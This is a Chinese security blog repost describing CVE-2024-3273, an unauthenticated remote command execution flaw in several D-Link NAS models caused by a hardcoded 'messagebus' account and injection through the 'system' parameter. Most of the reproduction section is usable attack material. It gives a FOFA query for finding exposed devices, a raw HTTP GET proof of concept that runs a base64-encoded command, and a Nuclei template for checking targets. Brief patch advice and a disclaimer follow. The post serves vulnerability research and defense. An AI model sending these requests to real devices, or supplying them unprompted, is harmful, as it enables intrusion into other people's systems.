D-Link NAS 未授权RCE

admin
admin
admin
140350
文章
117
评论
2024年5月19日23:54:06评论92 views字数 1899阅读6分19秒阅读模式
0x01 产品介绍
D-Link 网络存储 (NAS)是中国友讯(D-link)公司的一款统一服务路由器。
0x02 漏洞威胁
D-Link NAS nas_sharing.cgi接口存在命令执行漏洞,该漏洞存在于“/cgi-bin/nas_sharing.cgi”脚本中,影响其 HTTP GET 请求处理程序组件。漏洞成因是通过硬编码帐户(用户名:“messagebus”和空密码)造成的后门以及通过“system”参数的命令注入问题。未经身份验证的攻击者可利用此漏洞获取服务器权限。
D-Link NAS 未授权RCE
0x03 影响范围:

DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013DNS-325 Version 1.01DNS-327L Version 1.09, Version 1.00.0409.2013DNS-340L Version 1.08

0x04 漏洞复现

fofa语句

"Text:In order to access the ShareCenter, please make sure you are using a recent browser(IE 7+, Firefox 3+, Safari 4+, Chrome 3+, Opera 10+)"

D-Link NAS 未授权RCE

POC



GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1Host: your-ipUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)Accept-Encoding: identityAccept: */*Connection: keep-alive

D-Link NAS 未授权RCE

Nuclei脚本

id: CVE-2024-3273

info:  name:D-Link NAS 未授权RCE  author: kong  severity: high  description: 通过硬编码帐户(用户名:“messagebus”和空密码)造成的后门以及通过“system”参数的命令注入问题。未经身份验证的攻击者可利用此漏洞获取服务器权限。  reference:    - https://github.com/adhikara13/CVE-2024-3273  tags: tags

http:  - raw:      - |+        GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1        Host: {{Hostname}}        Cache-Control: max-age=0        Upgrade-Insecure-Requests: 1        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6        Connection: close



    matchers-condition: and    matchers:      - type: word        part: body        words:          - uid          - gid      - type: status        status:          - 200

修复建议

关闭互联网暴露面或接口

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://buaq.net/go-232770.htmlhttps://github.com/adhikara13/CVE-2024-3273https://www.trustwave.com/en-us/resources/security-resources/security-advisories

D-Link NAS 未授权RCE

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。

原文始发于微信公众号(巢安实验室):D-Link NAS 未授权RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月19日23:54:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   D-Link NAS 未授权RCEhttp://cn-sec.com/archives/2756791.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息